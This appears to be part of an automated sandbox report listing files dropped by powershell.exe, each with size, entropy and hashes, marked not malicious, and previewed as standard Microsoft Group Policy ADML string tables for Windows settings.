                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Windows Error Reporting</displayName>.. <description>Windows Error Reporting</description>.. <resources>.. <stringTable>.. <string id="CAT_WindowsErrorReporting">Windows Error Reporting</string>.. <string id="CAT_WindowsErrorReportingAdvanced">Advanced Error Reporting Settings</string>.. <string id="CAT_WindowsErrorReportingConsent">Consent</string>.. <string id="PCH_AllOrNoneDef">Default application reporting settings</string>.. <string id="PCH_AllOrNoneDef_Exclude">Do not report any application errors</string>.. <string id="PCH_AllOrNoneDef_Help">This policy setting controls whether errors in general applications are in
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2548
                                                                                          Entropy (8bit):4.859559586253688
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0"?>..<policyDefinitionResources revision="1.0" schemaVersion="1.0">...<displayName>Event Forwarding</displayName>.....<description>Policy Definitions For Event Forwarding</description>.....<resources>......<stringTable>.......<string id="EventForwarding">Event Forwarding</string>.... <string id="ForwarderResourceUsage">Configure forwarder resource usage</string>.. <string id="ForwarderResourceUsage_Help">This policy setting controls resource usage for the forwarder (source computer) by controlling the events/per second sent to the Event Collector.....If you enable this policy setting, you can control the volume of events sent to the Event Collector by the source computer. This may be required in high volume environments.....If you disable or do not configure this policy setting, forwarder resource usage is not specified.....This setting applies across all subscriptions for the forwarder (source computer).</string>.. .....<
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):7756
                                                                                          Entropy (8bit):4.821366715902771
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Channel_Log_AutoBackup">Back up log automatically when full</string>.. <string id="Channel_Log_AutoBackup_Help">This policy setting controls Event Log behavior when the log file reaches its maximum size and takes effect only if the "Retain old events" policy setting is enabled.....If you enable this policy setting and the "Retain old events" policy setting is enabled, the Event Log file is automatically closed and renamed when it is full. A new file is then started.....If you disable this policy setting and th
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2368
                                                                                          Entropy (8bit):4.905404060928818
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="EventViewer">Event Viewer</string>.. <string id="EventViewer_RedirectionProgram">Events.asp program</string>.. <string id="EventViewer_RedirectionProgram_Help">This is the program that will be invoked when the user clicks the events.asp link.</string>.. <string id="EventViewer_RedirectionProgramCommandLineParameters">Events.asp program command line parameters</string>.. <string id="EventViewer_RedirectionProgramCommandLineParameters_Help">This specifies the command line parameters that will be p
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (311), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):4363
                                                                                          Entropy (8bit):4.775276168335737
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AlwaysShowClassicMenu">Display the menu bar in File Explorer </string>.. <string id="AlwaysShowClassicMenu_Help">This policy setting configures File Explorer to always display the menu bar.....Note: By default, the menu bar is not displayed in File Explorer.....If you enable this policy setting, the menu bar will be displayed in File Explorer.....If you disable or do not configure this policy setting, the menu bar will not be displayed in File Explorer.....Note: When the menu bar is not displayed, users can ac
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2806
                                                                                          Entropy (8bit):4.897245212995506
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Portable Workspace</displayName>.. <description>This file contains Portable Workspace policy settings.</description>.. <resources>.. <stringTable>.. <string id="PortableOperatingSystem">Portable Operating System</string>.. <string id="PortableOperatingSystem_Launcher_DisplayName">Windows To Go Default Startup Options</string>.. <string id="PortableOperatingSystem_Launcher_Help">....This policy setting controls whether the PC will boot to Windows To Go if a USB device containing a Windows To Go workspace is connected, and controls whether users can make changes using the Windows To Go Startup Options Control Panel item.....If you enable
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):988
                                                                                          Entropy (8bit):5.031142948192133
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>File History</displayName>.. <description>File History</description>.. <resources>.. <stringTable>.. <string id="FileHistoryName">File History</string>.. <string id="DisableFileHistory">Turn off File History</string>.. <string id="DisableFileHistory_explanation">This policy setting allows you to turn off File History.....If you enable this policy setting, File History cannot be activated to create regular, automatic backups.....If you disable or do not configure this policy setting, File History can be activated to create regular, automatic backups.</string>.. </stringTable>.. </resources>..</policyDefinitionResources>..
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2975
                                                                                          Entropy (8bit):4.8069063103068785
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WdiScenarioCategory">Corrupted File Recovery</string>.. <string id="WdiScenarioExecutionPolicy">Configure Corrupted File Recovery behavior</string>.. <string id="WdiScenarioExecutionPolicyExplain">This policy setting allows you to configure the recovery behavior for corrupted files to one of three states:....Regular: Detection, troubleshooting, and recovery of corrupted files will automatically start with a minimal UI display. Windows will attempt to present you with a dialog box when a system restart is
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (591), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2614
                                                                                          Entropy (8bit):4.778560797244179
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8" standalone="yes"?>.. (c) Microsoft Corporation -->..<policyDefinitionResources xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0">.. Documentation says these are optional, but GPEdit does not agree-->.. <displayName>File Revocation Policy Settings</displayName>.. <description>File Revocation Policy Settings</description>.. <resources>.. <stringTable>.. <string id="FileRevocationCategory">File Revocation</string>.. <string id="DelegatedPackageFamilyNames_Name">Allow Windows Runtime apps to revoke enterprise data</string>.. <string id="DelegatedPackageFamilyNames_Help">Windows Runtime applications can protect content which has been associated with an enterprise identifier (EID), but can only revoke access to content it protected. To allow an application to revoke
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1516
                                                                                          Entropy (8bit):4.992519754988731
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.2" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. Component name -->.. <string id="Cat_FileShareShadowCopyProvider">File Share Shadow Copy Provider</string>.. Component name -->.... <string id="Pol_EncryptProtocol">Allow or Disallow use of encryption to protect the RPC protocol messages between File Share Shadow Copy Provider running on application server and File Share Shadow Copy Agent running on the file servers.</string>.. <string id="Pol_EncryptProtocol_Help">Determines whether the RPC protocol messagese used by VSS for SMB2 File Shares feat
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (466), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):5047
                                                                                          Entropy (8bit):4.778189792452432
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Filesystem">Filesystem</string>.. <string id="NTFS">NTFS</string>.. <string id="SymlinkEvalExplain">Symbolic links can introduce vulnerabilities in certain applications. To mitigate this issue, you can selectively enable or disable the evaluation of these types of symbolic links:....Local Link to a Local Target..Local Link to a Remote Target..Remote Link to Remote Target..Remote Link to Local Target....For further information please refer to the Windows Help section....NOTE: If this policy is Disabled or
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (565), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):7951
                                                                                          Entropy (8bit):4.723629934992763
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Fdeploy_Cat">Folder Redirection</string>.. <string id="LocalizeXPRelativePaths">Use localized subfolder names when redirecting Start Menu and My Documents</string>.. <string id="LocalizeXPRelativePaths_Help">This policy setting allows the administrator to define whether Folder Redirection should use localized names for the All Programs, Startup, My Music, My Pictures, and My Videos subfolders when redirecting the parent Start Menu and legacy My Documents folder respectively.....If you enable this policy s
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2163
                                                                                          Entropy (8bit):4.8446705224824
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ExplorerFramePanePolicies">Explorer Frame Pane</string>.. <string id="PreviewPane">Turn on or off details pane</string>.. <string id="PreviewPane_DropDownList_Show">Always show</string>.. <string id="PreviewPane_DropDownList_Hide">Always hide</string>.. <string id="PreviewPane_help">This policy setting shows or hides the Details Pane in File Explorer.....If you enable this policy setting and configure it to hide the pane, the Details Pane in File Explorer is hidden and cannot be turned on by the
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1897
                                                                                          Entropy (8bit):4.8809825480443285
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DownloadGameInfo">Turn off downloading of game information</string>.. <string id="DownloadGameInfo_Help">Manages download of game box art and ratings from the Windows Metadata Services.....If you enable this setting, game information including box art and ratings will not be downloaded. ....If you disable or do not configure this setting, game information will be downloaded from Windows Metadata Services.</string>.. <string id="GAMEUX">Game Explorer</string>.. <string id="ListRecentlyPlayed">Turn off
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (486), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):25531
                                                                                          Entropy (8bit):4.651678772761436
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="CustomLocalesNoSelect">Disallow selection of Custom Locales</string>.. <string id="CustomLocalesNoSelect_Help">This policy setting prevents a user from selecting a supplemental custom locale as their user locale. The user is restricted to the set of locales that are installed with the operating system.....This does not affect the selection of replacement locales. To prevent the selection of replacement locales, adjust the permissions of the %windir%\Globalization directory to prevent the installation of locale
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (301), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1487
                                                                                          Entropy (8bit):4.93565859545614
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ProcessTSUserLogonAsync">Allow asynchronous user Group Policy processing when logging on through Remote Desktop Services..</string>.. <string id="ProcessTSUserLogonAsync_Help">This policy setting allows Microsoft Windows to process user Group Policy settings asynchronously when logging on through Remote Desktop Services. Asynchronous user Group Policy processing is the default processing mode for Windows Vista and Windows XP.....By default, Window Server processes user Group Policy settings synchronously.....I
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (772), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60292
                                                                                          Entropy (8bit):4.712085259009764
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ResetDfsClientInfoDuringRefreshPolicy">Enable AD/DFS domain controller synchronization during policy refresh</string>.. <string id="ResetDfsClientInfoDuringRefreshPolicy_Help">Enabling this setting will cause the Group Policy Client to connect to the same domain controller for DFS shares as is being used for Active Directory.....</string>.. <string id="DisableAOACProcessing">Turn off Group Policy Client Service AOAC optimization</string>.. <string id="DisableAOACProcessing_Help">This policy setting p
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (500), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):133320
                                                                                          Entropy (8bit):4.822585844934633
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions" revision="1.0" schemaVersion="1.0">.. <displayName>Group Policy Preference Policies</displayName>.. <description></description>.. <resources>.. <stringTable>.. <string id="MMC_PrefApplications">Permit use of Application snap-ins</string>.. <string id="MMC_PrefApplications_Explain">This policy setting allows you to permit or prohibit use of Application snap-ins (Application preference item types). When prohibited, no Application preference item types appear when you attempt to create a new Application preference item, and you are unable to do so. This policy setting does not affect existing Application preference items.....If you enable or do not configure this policy setting, you permit use
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (399), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):5647
                                                                                          Entropy (8bit):4.726995944697996
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="HelpQualifiedRootDir_Comp">Restrict potentially unsafe HTML Help functions to specified folders</string>.. <string id="HelpQualifiedRootDir_Help">This policy setting allows you to restrict certain HTML Help commands to function only in HTML Help (.chm) files within specified folders and their subfolders. Alternatively, you can disable these commands on the entire system. It is strongly recommended that only folders requiring administrative privileges be added to this policy setting..... If you enable th
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):3089
                                                                                          Entropy (8bit):4.757831684112995
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Online Assistance</displayName>.. <description>Online Assistance</description>.. <resources>.. <stringTable>.. <string id="Assistance">Online Assistance</string>.. <string id="windowscomponents">Windows Components</string>.. <string id="ActiveHelpPolicy_Explain">This policy setting specifies whether active content links in trusted assistance content are rendered. By default, the Help viewer renders trusted assistance content with active elements such as ShellExecute links and Guided Help links.....If you enable this policy setting, active content links are not rendered. The text is displayed, but there are no clickable links for these elements.....If you disable or do not configu
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (543), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):19360
                                                                                          Entropy (8bit):4.641124398915221
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="CertMgr_DisableAutoRootUpdates">Turn off Automatic Root Certificates Update</string>.. <string id="CertMgr_DisableAutoRootUpdates_Help">This policy setting specifies whether to automatically update root certificates using the Windows Update website. ....Typically, a certificate is used when you use a secure website or when you send and receive secure email. Anyone can issue certificates, but to have transactions that are as secure as possible, certificates must be issued by a trusted certificate authority (CA)
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (743), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1408
                                                                                          Entropy (8bit):4.880333709783744
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3Fbef61y+kZDqGIZ0DafLMezn6FI2gFV:cgeD5x8gm8fKIZDqGTaYeeFcFV
                                                                                          MD5:426B83EC085AE7511EF7836624778786
                                                                                          SHA1:510FB2D8410021336EC73B9757A5E1A85FFA902B
                                                                                          SHA-256:73B3CBE01F0416F6DE28395E5B9AC286C8149D0F46BAB6AE86B6AC4E58B0F803
                                                                                          SHA-512:DECBFE7A847491E79F7CAD8AF64CDB650F82424CE657D44D8A8E9CF1BDFA413959DFD79349A88E8050EB6EB0715B4792AA2843E613A914C753A9211A07D2BF18
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="IIS">Internet Information Services</string>.. <string id="PreventIISInstall">Prevent IIS installation</string>.. <string id="PreventIISInstall_Help">"This policy setting prevents installation of Internet Information Services (IIS) on this computer. If you enable this policy setting, Internet Information Services (IIS) cannot be installed, and you will not be able to install Windows components or applications that require IIS. Users installing Windows components or applications that require IIS might not r
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (592), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):457561
                                                                                          Entropy (8bit):4.747379761820279
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:4ShXU4YfsUgEI5zZxU6AECqP68pxJXljJX2G439MYe1t8ob:ZMk43i1t8u
                                                                                          MD5:10590CE50B19C233DDB6EEC95850C5F4
                                                                                          SHA1:0E8CD5C92654B4655E317521164FE17548AC9284
                                                                                          SHA-256:9775D601260260CA0BDB805FD89AA5C3C126B8706458404A2405711DFD708647
                                                                                          SHA-512:9DEC09DF0555B8106AE2D1FE2C6405672A995687EB03B8382D0A23EF36FD273980FC15D4194142107FAFC59A148039BE7DF0FB22A4F9FC1153C06BE04AE4D18A
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="11.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="InternetCPL_Advanced_Accessibility">Accessibility</string>.. <string id="InternetCPL_Advanced_International">International</string>.. <string id="InternetCPL_Advanced_Security">Security</string>.. <string id="InternetCPL_Connections">Connections Page</string>.. <string id="InternetCPL_Content">Content Page</string>.. <string id="InternetCPL_Content_Certificates">Certificates</string>.. <string id="InternetCPL_General_Appearance">Appearance</string>.. <string id="InternetCPL_Gener
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (309), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1426
                                                                                          Entropy (8bit):4.787912997643585
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3Fbef61y8p/L1u10pKiuruwuNez27BshruwlOALVIVriFV:cgeD5x8gm8fKb2gzp7Be7OA5OOFV
                                                                                          MD5:386AFC1D42FDA5DA7B89C46B35C02635
                                                                                          SHA1:44DC5FF2A570253D5AE1C755604DFFE11EF58022
                                                                                          SHA-256:3930ADC5CC37AC32F2C02C1C3F288CAD45F18DDB232D5226B78E9CF7632014C2
                                                                                          SHA-512:32AFFF54025D2A4C313228C41DFF6C2858877F5B0341F1950C822021DD2D13F1C6B70A43761EECB204AAB83762FC48BC6548B4D40A3746B5AC11C8240C973786
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="PreventHandwritingErrorReports">Turn off handwriting recognition error reporting</string>.. <string id="PreventHandwritingErrorReports_Explain">Turns off the handwriting recognition error reporting tool.....The handwriting recognition error reporting tool enables users to report errors encountered in Tablet PC Input Panel. The tool generates error reports and transmits them to Microsoft over a secure connection. Microsoft uses these error reports to improve handwriting recognition in future versions of Windows
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (554), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):10440
                                                                                          Entropy (8bit):4.663520278145665
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pmaMIjP+dQzot5fZeuGnu9rAEQNsVS3sYgovZ4v/4euVuY9+UDVxgACCmskc:Ep8QzgfZeu1905teYUANOKIk
                                                                                          MD5:7783B0D4B182BE9230A649D6E8DC56AD
                                                                                          SHA1:215263A87F861BD2D8263BAD8011C5DDA0357BEB
                                                                                          SHA-256:DB2F6E21FDB453CD8E67C278038547D12EB5C58C1D0280776670D618AEDED64F
                                                                                          SHA-512:1B13DB33C12191ECF4687C6DEAF76E4776A10AAB045150C2A85369B0AA5553ECF42524A585A2A33905D1B124C1108FF2CACCDFE9C86D8CBBA89FD37E37F8D996
                                                                                          Malicious:false
